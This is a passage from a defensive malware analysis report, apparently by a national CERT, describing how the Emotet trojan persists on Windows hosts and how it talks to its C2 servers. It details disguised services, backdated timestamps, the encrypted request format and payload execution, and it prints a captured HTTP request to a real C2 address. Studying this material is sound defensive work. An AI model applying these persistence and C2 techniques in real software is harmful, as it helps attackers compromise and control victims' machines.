first run of a self-update. The command line arguments contain the file path where the executable will have to migrate to. In that case, states 8-13 perform a series of actions related to the persistence of the trojan. ----- Specifically, any existing file in the target file-path is renamed (state 8), the current executable is stored in the target file-path and its Zone Identifier ADS is removed (state 9). The created file is marked as “old” by changing its timestamps (state 10). If the process runs with administrative permissions, a new Service for the executable is created (state 11). Then, it waits until it receives a signal from its parent process (state 12). Finally, it runs itself from the newly created executable (state 13). In case that command line arguments are absent it’s either the first run after the Protector extracted the trojan or it’s any later run. This is inferred by checking the executable’s timestamp (state 5). In case it’s indeed a first-run, any existing Services for the executable are removed provided that the executable has administrative permissions (state 6), and then a random legitimate-looking file-path is picked as the target for the executable file (state 7). Then, states 8-13 run performing the series of actions described earlier. In case it not a first-run (indicated by a “recent” timestamp) and the trojan runs with administrative permissions, it checks whether its parent process name is “ services.exe ” (state 14). If so, it runs itself in a new process (state 13) and terminates the current process. Finally, if this is not the first run (indicated by an “old” timestamp), and the trojan runs without administrative rights or its parent process name is not “ services.exe “, the C2 communication flow happens. First, a new thread that monitors the changes of the current process’ executable filename is started (state 15). Then the control reaches state 16 and always returns to it until the current process’ executable filename changes. That will be the result of a self-update and after that, the trojan will wait for any threads to terminate (state 39) and then will terminate its process. While no changes of the filename are detected, the trojan will repeatedly communicate with C2. First, the C2 communication parameters are initialized once (states 17-20). Furthermore, the request data regarding the host system information are also initialized once (states 2126). On each communication attempt, the list of the processes currently running on the system as well as the list of active payload IDs will be included in the request (states 27-28). Then the actual communication with C2 is performed (states 29-31). Upon a successful communication the trojan will first check if a termination flag was received. In that case it will immediately move its executable to the Temp folder and terminate itself (state 38). Otherwise, any existing files in the folder containing the trojan’s executable are deleted and a new auto-run Registry Key is created (state 32). Then, the trojan will loop over the received payloads and execute them (state 33). On the rest of the chapter we will focus on two main functionalities of the trojan, the persistence mechanisms and the communication with the Command-and-Control servers. ### Persistence mechanisms ----- To identify its first run, the trojan should either run with command line arguments, or the ``` LastWriteTime of its executable file needs to be less than 8 days old. The timestamp is ``` retrieved by calling `GetFileInformationByHandleEx() on the handle returned by` ``` GetModuleFileNameW() . ``` Upon its first run, the trojan places its executable file in a sub-folder inside one of the following Windows Special Folders: ``` CSIDL_LOCAL_APPDATA (usually C:\Users\username\AppData\Local ) if the trojan ``` runs without administrator rights, or ``` CSIDL_SYSTEMX86 (usually C:\Windows\SysWOW64 ) if the trojan runs with ``` administrator rights. The names given to sub-folder names and the filename of the malware, depend on whether the executable did run with command line arguments or not: With no command line parameters, the malware chooses two random files from the legitimate executable (.exe) and library (.dll) files contained in the `CSIDL_SYSTEM` (usually `C:\Windows\System32 ) folder. The names of these randomly chosen files` are used to define the name of the sub-folder that the malware will be stored in, as well as the filename that the trojan will be stored with inside this sub-folder. When invoked with command line parameters, the sub-folder name and filename for the malware are parsed from the base64-encoded command line argument. The structure of the base64-decoded command line argument is described in detail in the Responses from C2 section. Furthermore, it deletes the corresponding `Zone.Identifier Alternate Data Stream` (which is added by the web client to mark files downloaded from external sites as possibly unsafe to run). Finally, all the timestamp attributes of the file ( CreationTime, LastAccessTime, `LastWriteTime` and ChangeTime ) are set to 8 days in the past. In this way, the next time the malware runs, will be aware that it is not the first time. To achieve persistence, two different methods are used: 1. Registry Key: Upon receiving a C2 response, it creates a sub-key of the `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` registry key. The sub-key type is String ( REG_SZ, `0x1 ), its name is the filename of` the trojan and the `Value is the full path inside the Windows Special Folder.` ----- 2. System Service: Upon its first run, if running with administrator rights it creates a new Service. The Service type is `SERVICE_WIN32_OWN_PROCESS ( 0x10 ) and its binary` path is the full path inside the Windows Special Folder. Once the service is created it picks a random legitimate service from the list returned by `EnumServicesStatusExW() and copies its description on the malicious service,` using `QueryServiceConfig2W() and` `ChangeServiceConfig2W() respectievely,` making it difficult to distinguish from legitimate services. ### Command-and-Control After achieving persistence, the trojan tries to communicate with one of the Command and Control (C2) servers to inform it about the compromised system and retrieve the payloads to execute. Emotet’s C2 network consists of multiple C2 servers with different C2 servers having different up-times, achieving redundancy and lowering the probability of detection. In total, we identified 126 unique C2 servers spread all over the world, mainly located in Europe, the Americas and south-east Asia: Figure 34. Emotet’s Command-and-Control server locations The trojan binaries come with the list of IPv4 addresses and ports of all C2 servers embedded. The C2 servers are tried sequentially, until one responds successfully. On the first run, the trojan starts from the first C2 server of the list. On all subsequent runs, it continues from the last C2 server that responded successfully. We again wrote a short script to automatically extract the IPv4 addresses and ports from the binaries, which can be found in [extract_c2_socket_addresses.py. Finally, all C2 servers share a common private key](https://github.com/grnet/emotet-utils/blob/master/utilities/extract_c2_socket_addresses.py) which is used for protecting the communication between the trojan and the C2 server. The public key is also embedded in the trojan binaries, albeit encrypted. ----- Data exchange between the trojan and the C2 server utilizes a complex serialization and deserialization mechanism, which includes compression and encryption of both the request and response data. The actual communication takes place over plain HTTP, presumably to evade protections based on flagged TLS certificates. During the trojan’s initialization phase, the C2’s RSA-768 public key is decrypted (using the decryption function described in the previous chapter) and a random AES-128 session key is generated (using the Windows Crypto API). The public key is used to encrypt the session key and verify the response and the session key to encrypt the request and decrypt the response. The encrypted session key is included in the request so that the C2 server can decrypt the request payload. Finally, SHA-1 is used for hashing. The primitive data types used in the exchanged messages are the `byte, the` `char and` the `uint (32-bit). The non-primitive data types are` `struct Bytes and` `struct String,` as shown in the following code snippet: ``` struct Bytes { byte *buffer; uint size; }; struct String { char *buffer; uint length; }; ``` All primitive data types are serialized in little-endian byte order. A `struct Bytes` is serialized to the size of the buffer followed by the actual bytes of the buffer. A `struct` ``` String is serialized to the length of the string followed by the characters of the string, ``` excluding the null terminator. **Request Payload** The trojan uses information gathered from the compromised system to assemble the request _payload. This includes information that can be used to uniquely identify the system,_ information about the operating system and the running processes as well as the current state of the trojan itself. Upon analyzing the binary, we concluded that the structure of the request payload as used internally by the trojan is the following: ``` struct RequestPayload { struct String systemId; uint systemInfo; uint rdpSessionId; uint date; uint value_1000; struct String otherProcessExecutableNames; struct Bytes payloadIds; uint currentProcessExecutablePathHash; }; ``` ----- The request payload struct is serialized to the serialized request payload by serializing and concatenating its fields in the order they appear, as shown in the image below. Figure 35. Emotet’s serialized request payload **systemId** The ID assigned to the compromised system. It is constructed using the format string ``` %s_%08X, where the first specifier corresponds to the computer name and the second ``` specifier to the volume serial number of the disk partition where Windows are installed. To get the computer name, `GetComputerNameA() is used. To get the volume serial number,` ``` GetWindowsDirectoryW() is used to get the drive letter of the partition where Windows ``` are installed and then `GetVolumeInformationW() is utilized to get the volume serial` number of that partition. Non-letter and non-digit characters in the computer name are ----- replaced by the character `X . For example, for the compromised system with computer` name `DESKTOP-K1C601 and volume serial number` `B4A6-FEC6 the value of` `systemId` would be `DESKTOPXK1C601_B4A6FEC6 .` **systemInfo** A numeric value that encodes information regarding the OS and the architecture of the compromised system. The trojan uses `RtlGetVersion() and` `GetNativeSystemInfo()` to get the `OSVERSIONINFOEXW and` `SYSTEM_INFO structures, respectively. The numeric value` is constructed as shown below: ``` OSVERSIONINFOEXW.wProductType * 100000 + OSVERSIONINFOEXW.dwMajorVersion * 1000 + OSVERSIONINFOEXW.dwMinorVersion * 100 + SYSTEM_INFO.wProcessorArchitecture ``` For example, the `systemInfo value of` `110009 means that the operating system is` Windows 10 and the processor architecture is x64: ``` wProductType : 1 ( VER_NT_WORKSTATION ) dwMajorVersion : 10 dwMinorVersion : 0 wProcessorArchitecture : 9 ( PROCESSOR_ARCHITECTURE_AMD64 ) ``` **rdpSessionId** The Remote Desktop Services session under which the current process is running. The trojan uses `GetCurrentProcessId() to get the current process ID and` ``` ProcessIdToSessionId() to convert the process ID to the RDP session ID. ``` **date** The value `20200416 is hardcoded in the request payload, which can presumably be` decoded to the date April 16, 2020. This could be the date that the current campaign started, however this cannot be confirmed. **value_1000** The value `1000 is hardcoded in the request payload. Its purpose is unknown.` **otherProcessExecutableNames** A comma-separated list of the names of all processes running in the system, except for the current and the parent processes. The trojan uses `CreateToolhelp32Snapshot() to take` a snapshot of all processes in the system and `Process32FirstW() / Process32NextW()` to iterate over them. The current and the parent processes are filtered out. For example: ``` SearchFilterHost.exe,SearchProtocolHost.exe,Taskmgr.exe,conhost.exe,PowerShell.exe,not ``` ----- **payloadIds** The IDs of the payloads received from the C2 server that are currently running. To support this functionality, the C2 server assigns an ID to every payload and the trojan maintains an in-memory list of the active payloads. Using this value, the C2 server is informed about the payloads that are currently running. The list of IDs is represented as an array of unsigned integers. For example, if the payloads with IDs `2643,` `2647, and` `2759 are currently` running, the value of `payloadIds would be:` ``` 53 0a 00 00 57 0a 00 00 c7 0a 00 00 ``` **currentProcessExecutablePathHash** The hash of the full path of the current process’ executable, lower-cased. The trojan uses ``` GetModuleFileNameW() to get the path and a custom hash function to hash the path, the ``` [reverse engineered version of which can be found in hashLowercase.c. For example, if the](https://github.com/grnet/emotet-utils/blob/master/decompiled/hashLowercase.c) path of the trojan’s executable was `C:\Users\IEUser\AppData\Local\dxdiag\reg.exe,` the hash value would be `0x9f955b9 .` **Request** The request encapsulates the request payload described before as well as the request flags. The request flags are used to specify the type of the request payload. ``` struct Request { uint flags; struct Bytes compressedPayload; }; ``` Before serializing the request struct, the serialized request payload is compressed using a LZ77-style algorithm, forming the compressed request payload. The request struct’s fields are serialized in the order they appear to form the serialized request, following again the aforementioned serialization rules. Finally, the session key is encrypted with the C2 servers’ public key (96 bytes), the serialized request is hashed (20 bytes) and then encrypted with the session key to form the encrypted _request. The encrypted session key, the request hash and the encrypted request form the_ request body. This is illustrated in the following image. ----- Figure 36. Emotet’s encrypted request **HTTP request-response** The trojan communicates with the C2 server over plain HTTP, using the WinINet API. In preparation of the communication, the trojan generates a random URL path, a random boundary for the multipart/form-data body and random field and file names for the form part to be submitted. Various headers (e.g. the Accept header) are hardcoded, while others (e.g. the User-Agent header) are system-dependent. Following is a sample HTTP request sent by the trojan to a C2 server: ``` GET /3QDtL0eyVn/macjAF9/ HTTP/1.1 Host: 46.101.58.37:8080 Cache-Control: no-cache Upgrade-Insecure-Requests: 1 Referer: 46.101.58.37/ Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E) DNT: 1 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------gby5HOqeZpTWuWuQV0Pq0e Content-Length: 5090 -----------------gby5HOqeZpTWuWuQV0Pq0e Content-Disposition: form-data; name="iopq"; filename="yyexctg" Content-Type: application/octet-stream -----------------gby5HOqeZpTWuWuQV0Pq0e- ``` And the corresponding HTTP response: ----- ``` HTTP/1.1 200 OK Server: nginx Date: Tue, 05 Jan 2021 18:09:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 87076 Connection: keep-alive Vary: Accept-Encoding ``` **Response** Just like the request body, the response body consists of three parts, the compressed response’s signature, the compressed response’s hash and the encrypted response. The signature is generated by the C2 servers’ private key and the compressed response is encrypted using the session key submitted to the C2 server as part of the request. Figure 37. Emotet’s encrypted response Upon decrypting the encrypted response, the trojan retrieves a `uint representing the` decompressed response size followed by the compressed response, which can be decompressed to the serialized response using the same LZ77-style algorithm that was used to compress the request. Finally, the serialized response can be deserialized to the following struct, adhering again to the common serialization rules. ``` struct Response { struct Bytes serializedPayload; uint flags; }; ``` The response flags are used to inform the trojan whether to continue or terminate its operation after executing the payload. **Response Payload** The serialized response payload is a series of serialized `struct Bytes, each of which` contains a serialized response payload struct. ----- ``` struct ResponsePayload { uint payloadId; uint payloadType; struct Bytes payload; }; ``` serialized response payload **payloadId** Figure 38. Emotet’s Every payload has a unique ID. As discussed in the subsection about the request payload, this is used to keep track of the payloads that are being executed by each compromised system. Payload IDs are incremental integers. **payloadType** Each received payload is handled based on the payloadType property. There are 4 payload types: Type 1 ( 0x1 ): the payload is an executable (.exe) and it is written to a file which is executed in a new process, using `CreateProcessW() .` Type 2 ( 0x2 ): the payload is an executable (.exe) and it is written to a file which is is executed in a new local user process, using `CreateProcessAsUserW() .` Type 3 ( 0x3 ): the payload is a dynamic-link library (.dll), it is loaded into the address space of the trojan’s process by a custom loader (similar to those discussed in previous chapters) and then its entrypoint is called in a new thread, using `CreateThread() .` Type 4 ( 0x4 ): the payload is an executable (.exe) and it is written to a file which is executed in a new process, using `CreateProcessW(), with command line arguments.` For types 1, 2 and 4, the file is stored the same directory where the executable of the trojan resides. Its filename is generated by concatenating the name without the extension of a random .exe or .dll file in the `CSIDL_SYSTEM ( C:\Windows\System32 ) directory, the` payload ID in a hexadecimal format ( %x ) and the “ `exe ” extension` ----- For type 3, the entry-point is called with a non-standard reason ( 10 ) and the reserved argument is a pointer to a struct with the system ID and the C2 servers’ public key in DER format, as shown below. ``` struct DllArgs { char *systemId; struct Bytes c2PublicKeyDer; }; ``` For type 4, the executable is called with a single command line argument, which is a base64encoded serialized struct with a handle to the calling process and the parent directory and name of the calling process’ executable, as shown below. This type is used for updating Emotet to newer versions. ``` struct CmdLineArgs { HANDLE *hProcess; WCHAR *directoryAndFilenameWithoutExtension; DWORD directoryAndFilenameWithoutExtensionLength; } ``` **payload** The actual data of the payload. ## Chapter 5. Monitoring the updates ### Introduction In the previous chapter we thoroughly described the internals of the trojan. Having a good understanding of the communication protocol between the trojan and the C2 network we could now communicate with any C2 server, posing as an instance of the trojan. In this final chapter we show the custom client that we developed in order to communicate with the C2 servers with arbitrary requests and describe the responses that we received. Furthermore, we briefly describe how we used the Ghidra Scripting API in order to automate repeated processes of reverse-engineering which proved to be helpful for extracting useful information out of the received update payloads (e.g. new IP addresses of the C2 network). ### Developing a custom “Emotet” client We have already described the communication between the trojan instances and the C2 network, including the detection of the C2 servers, the structure of the requests and responses as well as the compression and encryption algorithms. Based on this analysis we could develop our own Emotet client, which allowed us to perform requests with arbitrary request payloads. Like the rest of the scripts, the client was implemented in Python. The [source code can be found in client.py. Using this client, we could monitor the uptime of each](https://github.com/grnet/emotet-utils/blob/master/utilities/client.py) of the listed C2 servers and parse the C2 responses. ----- Most of the C2 responses were loadable DLL extensions to the trojan (type 3). The payloads received from different C2 servers at the same point in time were identical or almost identical, differing only in the first 48 bytes of the read-only data section. Some of the payloads were obfuscated using variations of the techniques described in Chapter 3, while others were not. The only update (type 4) that we received during our analysis was Europol’s clean-up client. From the collected statistics, only a fraction of the C2 servers were online at each time. The set of active C2 servers was changing over time, pressumably to avoid triggering alerts and being detected. ### Automating repeated reverse-engineering processes On each received payload we had to repeat the processes that we followed to overcome the incorporated obfuscation techniques. Since these techniques were slightly different for each payload (e.g. different XOR keys were used, algorithm constants were modified, variables were stored in different memory addresses, etc.) we had to develop some pieces of code implementing some basic logic. We used the Ghidra scripting API and developed Python scripts that automated repeated process that required considerable manual effort. Specifically, the two main processes that were automated are the decryption of the strings and the resolution of the imported symbols. These basic automations made the analysis of the received updates significantly easier. Implementation of the algorithms can also be found in [decrypt_bytes.py and](https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py) [generate_symbol_hashes2.py.](https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py) ## Epilogue In this analysis we documented our defensive strategy against a large trojan-spreading campaign. Our approach was based on static analysis and reverse engineering. We initially avoided running any of the trojan’s stages. This was an intentional choice because with dynamic analysis certain conditions and corner cases could not have been triggered and whole code paths could have been skipped. After many hours of reverse engineering and building enough confidence that we had a full understanding of the trojan’s inner workings, we used dynamic instrumentation to confirm our observations. For the latter we used the Frida dynamic instrumentation toolkit. Nevertheless, as shown by our work, the dynamic analysis of a malware is not always required in order to undestand and analyze its functionality. Notice that in this analysis we only focused on analyzing the trojan itself and intentionally skipped the analysis of payloads spread by the C2 network. From the analysis of the trojan’s internals in Chapter 4, it became apparent that Emotet enables the C2 servers to run arbitrary payloads on infected computers. It is known that Emotet had been used in order to spread banking-related malware, e-mail harvesting malware, as well as ransomware. However, analyzing those payloads was considered out of the scope of planning a generic defense against Emotet ----- Finally, we did not include any analysis of the last payload that our update-monitoring infrastructure received, which according to our observations and combined with public reports is Europol’s clean-up payload. We hope that IT Security professionals will find our work useful for defending against similar malware in the future. © 2022 GRNET CERT. -----